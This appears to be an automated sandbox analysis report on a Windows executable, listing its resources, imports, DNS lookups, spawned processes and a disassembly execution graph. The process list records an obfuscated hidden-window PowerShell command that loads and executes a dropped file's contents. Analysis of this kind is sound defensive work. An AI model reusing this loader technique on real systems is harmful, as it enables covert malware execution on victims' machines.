      RT_ICON0x669b80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishUnited States0.30510752688172044
      RT_ICON0x66ca00x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishUnited States0.5
      RT_DIALOG0x66dc80x140dataEnglishUnited States0.471875
      RT_DIALOG0x66f080x11cdataEnglishUnited States0.6091549295774648
      RT_DIALOG0x670280xc4dataEnglishUnited States0.5918367346938775
      RT_DIALOG0x670f00x60dataEnglishUnited States0.7291666666666666
      RT_GROUP_ICON0x671500x92dataEnglishUnited States0.6301369863013698
      RT_VERSION0x671e80x25cdataEnglishUnited States0.5198675496688742
      RT_MANIFEST0x674480x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795

      Imports

      DLLImport
      KERNEL32.dllSetCurrentDirectoryW, GetFileAttributesW, GetFullPathNameW, Sleep, GetTickCount, CreateFileW, GetFileSize, MoveFileW, SetFileAttributesW, GetModuleFileNameW, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, WaitForSingleObject, GetCurrentProcess, CompareFileTime, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, WriteFile, lstrcpyA, lstrcpyW, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GlobalFree, GlobalAlloc, GetShortPathNameW, SearchPathW, lstrcmpiW, SetFileTime, CloseHandle, ExpandEnvironmentStringsW, lstrcmpW, GetDiskFreeSpaceW, lstrlenW, lstrcpynW, GetExitCodeProcess, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, lstrlenA, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
      USER32.dllGetSystemMenu, SetClassLongW, IsWindowEnabled, EnableMenuItem, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, wsprintfW, ScreenToClient, GetWindowRect, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, LoadImageW, SetTimer, SetWindowTextW, PostQuitMessage, ShowWindow, GetDlgItem, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, DrawTextW, EndPaint, CreateDialogParamW, SendMessageTimeoutW, SetForegroundWindow
      GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
      SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
      ADVAPI32.dllRegDeleteKeyW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
      COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
      ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

      Possible Origin

      Language of compilation systemCountry where language is spokenMap
      EnglishUnited States

      Network Behavior

      DNS Answers

      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
      Jan 10, 2025 18:40:28.840118885 CET1.1.1.1192.168.2.50xa487No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comdefault.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comCNAME (Canonical name)IN (0x0001)false
      Jan 10, 2025 18:40:28.840118885 CET1.1.1.1192.168.2.50xa487No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com84.201.210.38A (IP address)IN (0x0001)false
      Jan 10, 2025 18:40:28.840118885 CET1.1.1.1192.168.2.50xa487No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.26A (IP address)IN (0x0001)false
      Jan 10, 2025 18:40:28.840118885 CET1.1.1.1192.168.2.50xa487No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.42A (IP address)IN (0x0001)false
      Jan 10, 2025 18:40:28.840118885 CET1.1.1.1192.168.2.50xa487No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.37A (IP address)IN (0x0001)false
      Jan 10, 2025 18:40:28.840118885 CET1.1.1.1192.168.2.50xa487No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.43A (IP address)IN (0x0001)false
      Jan 10, 2025 18:40:28.840118885 CET1.1.1.1192.168.2.50xa487No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com84.201.210.21A (IP address)IN (0x0001)false
      Jan 10, 2025 18:40:28.840118885 CET1.1.1.1192.168.2.50xa487No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.23A (IP address)IN (0x0001)false
      Jan 10, 2025 18:40:28.840118885 CET1.1.1.1192.168.2.50xa487No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com84.201.210.36A (IP address)IN (0x0001)false

      Statistics

      CPU Usage

      Click to jump to process

      Memory Usage

      Click to jump to process

      High Level Behavior Distribution

      Click to dive into process behavior distribution

      Behavior

      Click to jump to process

      System Behavior

      General

      Target ID:0
      Start time:12:40:11
      Start date:10/01/2025
      Path:C:\Users\user\Desktop\Ej86aa7Ki7.exe
      Wow64 process (32bit):true
      Commandline:"C:\Users\user\Desktop\Ej86aa7Ki7.exe"
      Imagebase:0x400000
      File size:840'408 bytes
      MD5 hash:CC768B964D98FA2D0CF4D9089176C6B9
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:low
      Has exited:true

      General

      Target ID:2
      Start time:12:40:12
      Start date:10/01/2025
      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Wow64 process (32bit):true
      Commandline:powershell.exe -windowstyle hidden "$Fysioterapiens=gc -raw 'C:\Users\user\AppData\Roaming\afdragsordning\Taarnvognenes.Ufe';$Blinn=$Fysioterapiens.SubString(29179,3);.$Blinn($Fysioterapiens)
      Imagebase:0x4b0000
      File size:433'152 bytes
      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:false

      General

      Target ID:3
      Start time:12:40:12
      Start date:10/01/2025
      Path:C:\Windows\System32\conhost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Imagebase:0x7ff6d64d0000
      File size:862'208 bytes
      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:false

      General

      Target ID:4
      Start time:12:40:27
      Start date:10/01/2025
      Path:C:\Windows\System32\SIHClient.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\System32\sihclient.exe /cv LjRh2CI4qEuakRNETXm55Q.0.2
      Imagebase:0x7ff692c60000
      File size:380'720 bytes
      MD5 hash:8BE47315BF30475EEECE8E39599E9273
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:moderate
      Has exited:true

      General

      Target ID:6
      Start time:12:41:28
      Start date:10/01/2025
      Path:C:\Windows\SysWOW64\msiexec.exe
      Wow64 process (32bit):false
      Commandline:"C:\Windows\SysWOW64\msiexec.exe"
      Imagebase:0x7e0000
      File size:59'904 bytes
      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      General

      Target ID:7
      Start time:12:41:28
      Start date:10/01/2025
      Path:C:\Windows\SysWOW64\msiexec.exe
      Wow64 process (32bit):false
      Commandline:"C:\Windows\SysWOW64\msiexec.exe"
      Imagebase:0x7e0000
      File size:59'904 bytes
      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      General

      Target ID:8
      Start time:12:41:28
      Start date:10/01/2025
      Path:C:\Windows\SysWOW64\msiexec.exe
      Wow64 process (32bit):false
      Commandline:"C:\Windows\SysWOW64\msiexec.exe"
      Imagebase:0x7e0000
      File size:59'904 bytes
      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      General

      Target ID:9
      Start time:12:41:28
      Start date:10/01/2025
      Path:C:\Windows\SysWOW64\msiexec.exe
      Wow64 process (32bit):false
      Commandline:"C:\Windows\SysWOW64\msiexec.exe"
      Imagebase:0x7e0000
      File size:59'904 bytes
      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      General

      Target ID:10
      Start time:12:41:28
      Start date:10/01/2025
      Path:C:\Windows\SysWOW64\msiexec.exe
      Wow64 process (32bit):false
      Commandline:"C:\Windows\SysWOW64\msiexec.exe"
      Imagebase:0x7e0000
      File size:59'904 bytes
      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      General

      Target ID:11
      Start time:12:41:28
      Start date:10/01/2025
      Path:C:\Windows\SysWOW64\msiexec.exe
      Wow64 process (32bit):false
      Commandline:"C:\Windows\SysWOW64\msiexec.exe"
      Imagebase:0x7e0000
      File size:59'904 bytes
      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      General

      Target ID:12
      Start time:12:41:28
      Start date:10/01/2025
      Path:C:\Windows\SysWOW64\msiexec.exe
      Wow64 process (32bit):false
      Commandline:"C:\Windows\SysWOW64\msiexec.exe"
      Imagebase:0x7e0000
      File size:59'904 bytes
      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:true

      General

      Target ID:13
      Start time:12:41:28
      Start date:10/01/2025
      Path:C:\Windows\SysWOW64\msiexec.exe
      Wow64 process (32bit):false
      Commandline:"C:\Windows\SysWOW64\msiexec.exe"
      Imagebase:0x7e0000
      File size:59'904 bytes
      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:true

      General

      Target ID:14
      Start time:12:41:28
      Start date:10/01/2025
      Path:C:\Windows\SysWOW64\msiexec.exe
      Wow64 process (32bit):false
      Commandline:"C:\Windows\SysWOW64\msiexec.exe"
      Imagebase:0x7e0000
      File size:59'904 bytes
      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:true

      General

      Target ID:15
      Start time:12:41:28
      Start date:10/01/2025
      Path:C:\Windows\SysWOW64\msiexec.exe
      Wow64 process (32bit):false
      Commandline:"C:\Windows\SysWOW64\msiexec.exe"
      Imagebase:0x7e0000
      File size:59'904 bytes
      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:true

      General

      Target ID:16
      Start time:12:41:28
      Start date:10/01/2025
      Path:C:\Windows\SysWOW64\dxdiag.exe
      Wow64 process (32bit):false
      Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
      Imagebase:0xe30000
      File size:222'720 bytes
      MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:true

      General

      Target ID:17
      Start time:12:41:28
      Start date:10/01/2025
      Path:C:\Windows\SysWOW64\dxdiag.exe
      Wow64 process (32bit):false
      Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
      Imagebase:0xe30000
      File size:222'720 bytes
      MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:true

      General

      Target ID:18
      Start time:12:41:28
      Start date:10/01/2025
      Path:C:\Windows\SysWOW64\dxdiag.exe
      Wow64 process (32bit):false
      Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
      Imagebase:0xe30000
      File size:222'720 bytes
      MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:true

      General

      Target ID:19
      Start time:12:41:28
      Start date:10/01/2025
      Path:C:\Windows\SysWOW64\dxdiag.exe
      Wow64 process (32bit):false
      Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
      Imagebase:0xe30000
      File size:222'720 bytes
      MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:true

      General

      Target ID:20
      Start time:12:41:28
      Start date:10/01/2025
      Path:C:\Windows\SysWOW64\dxdiag.exe
      Wow64 process (32bit):false
      Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
      Imagebase:0xe30000
      File size:222'720 bytes
      MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:true

      General

      Target ID:21
      Start time:12:41:28
      Start date:10/01/2025
      Path:C:\Windows\SysWOW64\dxdiag.exe
      Wow64 process (32bit):false
      Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
      Imagebase:0xe30000
      File size:222'720 bytes
      MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:true

      General

      Target ID:22
      Start time:12:41:28
      Start date:10/01/2025
      Path:C:\Windows\SysWOW64\dxdiag.exe
      Wow64 process (32bit):false
      Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
      Imagebase:0xe30000
      File size:222'720 bytes
      MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:true

      General

      Target ID:23
      Start time:12:41:28
      Start date:10/01/2025
      Path:C:\Windows\SysWOW64\dxdiag.exe
      Wow64 process (32bit):false
      Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
      Imagebase:0xe30000
      File size:222'720 bytes
      MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:true

      General

      Target ID:24
      Start time:12:41:28
      Start date:10/01/2025
      Path:C:\Windows\SysWOW64\dxdiag.exe
      Wow64 process (32bit):false
      Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
      Imagebase:0xe30000
      File size:222'720 bytes
      MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:true

      General

      Target ID:25
      Start time:12:41:28
      Start date:10/01/2025
      Path:C:\Windows\SysWOW64\dxdiag.exe
      Wow64 process (32bit):false
      Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
      Imagebase:0xe30000
      File size:222'720 bytes
      MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:true

      General

      Target ID:26
      Start time:12:41:28
      Start date:10/01/2025
      Path:C:\Windows\SysWOW64\dxdiag.exe
      Wow64 process (32bit):false
      Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
      Imagebase:0xe30000
      File size:222'720 bytes
      MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:true

      General

      Target ID:27
      Start time:12:41:29
      Start date:10/01/2025
      Path:C:\Windows\SysWOW64\msiexec.exe
      Wow64 process (32bit):false
      Commandline:"C:\Windows\SysWOW64\msiexec.exe"
      Imagebase:0x7e0000
      File size:59'904 bytes
      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:true

      General

      Target ID:28
      Start time:12:41:29
      Start date:10/01/2025
      Path:C:\Windows\SysWOW64\msiexec.exe
      Wow64 process (32bit):false
      Commandline:"C:\Windows\SysWOW64\msiexec.exe"
      Imagebase:0x7e0000
      File size:59'904 bytes
      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:true

      General

      Target ID:29
      Start time:12:41:29
      Start date:10/01/2025
      Path:C:\Windows\SysWOW64\msiexec.exe
      Wow64 process (32bit):false
      Commandline:"C:\Windows\SysWOW64\msiexec.exe"
      Imagebase:0x7e0000
      File size:59'904 bytes
      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:true

      General

      Target ID:30
      Start time:12:41:29
      Start date:10/01/2025
      Path:C:\Windows\SysWOW64\msiexec.exe
      Wow64 process (32bit):false
      Commandline:"C:\Windows\SysWOW64\msiexec.exe"
      Imagebase:0x7e0000
      File size:59'904 bytes
      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:true

      General

      Target ID:31
      Start time:12:41:29
      Start date:10/01/2025
      Path:C:\Windows\SysWOW64\msiexec.exe
      Wow64 process (32bit):false
      Commandline:"C:\Windows\SysWOW64\msiexec.exe"
      Imagebase:0x7e0000
      File size:59'904 bytes
      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:true

      General

      Target ID:32
      Start time:12:41:29
      Start date:10/01/2025
      Path:C:\Windows\SysWOW64\msiexec.exe
      Wow64 process (32bit):false
      Commandline:"C:\Windows\SysWOW64\msiexec.exe"
      Imagebase:0x7e0000
      File size:59'904 bytes
      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:true

      General

      Target ID:33
      Start time:12:41:29
      Start date:10/01/2025
      Path:C:\Windows\SysWOW64\msiexec.exe
      Wow64 process (32bit):false
      Commandline:"C:\Windows\SysWOW64\msiexec.exe"
      Imagebase:0x7e0000
      File size:59'904 bytes
      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:true

      General

      Target ID:34
      Start time:12:41:29
      Start date:10/01/2025
      Path:C:\Windows\SysWOW64\msiexec.exe
      Wow64 process (32bit):false
      Commandline:"C:\Windows\SysWOW64\msiexec.exe"
      Imagebase:0x7e0000
      File size:59'904 bytes
      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:true

      General

      Target ID:35
      Start time:12:41:29
      Start date:10/01/2025
      Path:C:\Windows\SysWOW64\msiexec.exe
      Wow64 process (32bit):false
      Commandline:"C:\Windows\SysWOW64\msiexec.exe"
      Imagebase:0x7e0000
      File size:59'904 bytes
      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:true

      General

      Target ID:36
      Start time:12:41:29
      Start date:10/01/2025
      Path:C:\Windows\SysWOW64\msiexec.exe
      Wow64 process (32bit):false
      Commandline:"C:\Windows\SysWOW64\msiexec.exe"
      Imagebase:0x7e0000
      File size:59'904 bytes
      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:true

      General

      Target ID:37
      Start time:12:41:29
      Start date:10/01/2025
      Path:C:\Windows\SysWOW64\dxdiag.exe
      Wow64 process (32bit):false
      Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
      Imagebase:0xe30000
      File size:222'720 bytes
      MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:true

      General

      Target ID:38
      Start time:12:41:29
      Start date:10/01/2025
      Path:C:\Windows\SysWOW64\dxdiag.exe
      Wow64 process (32bit):false
      Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
      Imagebase:0xe30000
      File size:222'720 bytes
      MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:true

      General

      Target ID:39
      Start time:12:41:29
      Start date:10/01/2025
      Path:C:\Windows\SysWOW64\dxdiag.exe
      Wow64 process (32bit):false
      Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
      Imagebase:0xe30000
      File size:222'720 bytes
      MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:true

      General

      Target ID:40
      Start time:12:41:29
      Start date:10/01/2025
      Path:C:\Windows\SysWOW64\dxdiag.exe
      Wow64 process (32bit):false
      Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
      Imagebase:0xe30000
      File size:222'720 bytes
      MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:true

      General

      Target ID:41
      Start time:12:41:29
      Start date:10/01/2025
      Path:C:\Windows\SysWOW64\dxdiag.exe
      Wow64 process (32bit):false
      Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
      Imagebase:0xe30000
      File size:222'720 bytes
      MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:true

      Disassembly

      Reset < >

        Execution Graph

        Execution Coverage:21.7%
        Dynamic/Decrypted Code Coverage:0%
        Signature Coverage:20.3%
        Total number of Nodes:1344
        Total number of Limit Nodes:29
        execution_graph 3104 4015c1 3123 402c53 3104->3123 3108 401631 3110 401663 3108->3110 3111 401636 3108->3111 3113 401423 25 API calls 3110->3113 3147 401423 3111->3147 3120 40165b 3113->3120 3117 4015d1 3117->3108 3121 401617 GetFileAttributesW 3117->3121 3135 405bf3 3117->3135 3139 4058da 3117->3139 3142 405840 CreateDirectoryW 3117->3142 3151 4058bd CreateDirectoryW 3117->3151 3119 40164a SetCurrentDirectoryW 3119->3120 3121->3117 3124 402c5f 3123->3124 3154 406234 3124->3154 3127 4015c8 3129 405c71 CharNextW CharNextW 3127->3129 3130 405ca0 3129->3130 3131 405c8e 3129->3131 3133 405cc4 3130->3133 3134 405bf3 CharNextW 3130->3134 3131->3130 3132 405c9b CharNextW 3131->3132 3132->3133 3133->3117 3134->3130 3136 405bf9 3135->3136 3137 405c0f 3136->3137 3138 405c00 CharNextW 3136->3138 3137->3117 3138->3136 3189 4065ec GetModuleHandleA 3139->3189 3143 405891 GetLastError 3142->3143 3144 40588d 3142->3144 3143->3144 3145 4058a0 SetFileSecurityW 3143->3145 3144->3117 3145->3144 3146 4058b6 GetLastError 3145->3146 3146->3144 3198 405371 3147->3198 3150 406212 lstrcpynW 3150->3119 3152 4058d1 GetLastError 3151->3152 3153 4058cd 3151->3153 3152->3153 3153->3117 3170 406241 3154->3170 3155 40648c 3156 402c80 3155->3156 3188 406212 lstrcpynW 3155->3188 3156->3127 3172 4064a6 3156->3172 3158 4062f4 GetVersion 3158->3170 3159 40645a lstrlenW 3159->3170 3162 406234 10 API calls 3162->3159 3164 40636f GetSystemDirectoryW 3164->3170 3165 406382 GetWindowsDirectoryW 3165->3170 3166 4064a6 5 API calls 3166->3170 3167 4063b6 SHGetSpecialFolderLocation 3167->3170 3171 4063ce SHGetPathFromIDListW CoTaskMemFree 3167->3171 3168 406234 10 API calls 3168->3170 3169 4063fb lstrcatW 3169->3170 3170->3155 3170->3158 3170->3159 3170->3162 3170->3164 3170->3165 3170->3166 3170->3167 3170->3168 3170->3169 3181 4060df RegOpenKeyExW 3170->3181 3186 406159 wsprintfW 3170->3186 3187 406212 lstrcpynW 3170->3187 3171->3170 3178 4064b3 3172->3178 3173 40652e CharPrevW 3175 406529 3173->3175 3174 40651c CharNextW 3174->3175 3174->3178 3175->3173 3176 40654f 3175->3176 3176->3127 3177 405bf3 CharNextW 3177->3178 3178->3174 3178->3175 3178->3177 3179 406508 CharNextW 3178->3179 3180 406517 CharNextW 3178->3180 3179->3178 3180->3174 3182 406153 3181->3182 3183 406113 RegQueryValueExW 3181->3183 3182->3170 3185 406134 RegCloseKey 3183->3185 3185->3182 3186->3170 3187->3170 3188->3156 3190 406612 GetProcAddress 3189->3190 3191 406608 3189->3191 3193 4058e1 3190->3193 3195 40657c GetSystemDirectoryW 3191->3195 3193->3117 3194 40660e 3194->3190 3194->3193 3196 40659e wsprintfW LoadLibraryExW 3195->3196 3196->3194 3199 40538c 3198->3199 3208 401431 3198->3208 3200 4053a8 lstrlenW 3199->3200 3201 406234 18 API calls 3199->3201 3202 4053d1 3200->3202 3203 4053b6 lstrlenW 3200->3203 3201->3200 3205 4053e4 3202->3205 3206 4053d7 SetWindowTextW 3202->3206 3204 4053c8 lstrcatW 3203->3204 3203->3208 3204->3202 3207 4053ea SendMessageW SendMessageW SendMessageW 3205->3207 3205->3208 3206->3205 3207->3208 3208->3150 3209 401941 3210 401943 3209->3210 3211 402c53 18 API calls 3210->3211 3212 401948 3211->3212 3215 405a03 3212->3215 3251 405cce 3215->3251 3218 405a42 3222 405b62 3218->3222 3265 406212 lstrcpynW 3218->3265 3219 405a2b DeleteFileW 3247 401951 3219->3247 3221 405a68 3223 405a7b 3221->3223 3224 405a6e lstrcatW 3221->3224 3222->3247 3283 406555 FindFirstFileW 3222->3283 3266 405c12 lstrlenW 3223->3266 3227 405a81 3224->3227 3228 405a91 lstrcatW 3227->3228 3230 405a9c lstrlenW FindFirstFileW 3227->3230 3228->3230 3230->3222 3249 405abe 3230->3249 3233 405b45 FindNextFileW 3237 405b5b FindClose 3233->3237 3233->3249 3234 4059bb 5 API calls 3236 405b9d 3234->3236 3238 405ba1 3236->3238 3239 405bb7 3236->3239 3237->3222 3242 405371 25 API calls 3238->3242 3238->3247 3241 405371 25 API calls 3239->3241 3241->3247 3244 405bae 3242->3244 3243 405a03 62 API calls 3243->3249 3246 4060b3 38 API calls 3244->3246 3245 405371 25 API calls 3245->3233 3246->3247 3248 405371 25 API calls 3248->3249 3249->3233 3249->3243 3249->3245 3249->3248 3270 406212 lstrcpynW 3249->3270 3271 4059bb 3249->3271 3279 4060b3 MoveFileExW 3249->3279 3289 406212 lstrcpynW 3251->3289 3253 405cdf 3254 405c71 4 API calls 3253->3254 3255 405ce5 3254->3255 3256 405a23 3255->3256 3257 4064a6 5 API calls 3255->3257 3256->3218 3256->3219 3263 405cf5 3257->3263 3258 405d26 lstrlenW 3259 405d31 3258->3259 3258->3263 3261 405bc6 3 API calls 3259->3261 3260 406555 2 API calls 3260->3263 3262 405d36 GetFileAttributesW 3261->3262 3262->3256 3263->3256 3263->3258 3263->3260 3264 405c12 2 API calls 3263->3264 3264->3258 3265->3221 3267 405c20 3266->3267 3268 405c32 3267->3268 3269 405c26 CharPrevW 3267->3269 3268->3227 3269->3267 3269->3268 3270->3249 3290 405dc2 GetFileAttributesW 3271->3290 3273 4059e8 3273->3249 3275 4059d6 RemoveDirectoryW 3277 4059e4 3275->3277 3276 4059de DeleteFileW 3276->3277 3277->3273 3278 4059f4 SetFileAttributesW 3277->3278 3278->3273 3280 4060d4 3279->3280 3281 4060c7 3279->3281 3280->3249 3293 405f41 lstrcpyW 3281->3293 3284 405b87 3283->3284 3285 40656b FindClose 3283->3285 3284->3247 3286 405bc6 lstrlenW CharPrevW 3284->3286 3285->3284 3287 405be2 lstrcatW 3286->3287 3288 405b91 3286->3288 3287->3288 3288->3234 3289->3253 3291 4059c7 3290->3291 3292 405dd4 SetFileAttributesW 3290->3292 3291->3273 3291->3275 3291->3276 3292->3291 3294 405f69 3293->3294 3295 405f8f GetShortPathNameW 3293->3295 3320 405de7 GetFileAttributesW CreateFileW 3294->3320 3297 405fa4 3295->3297 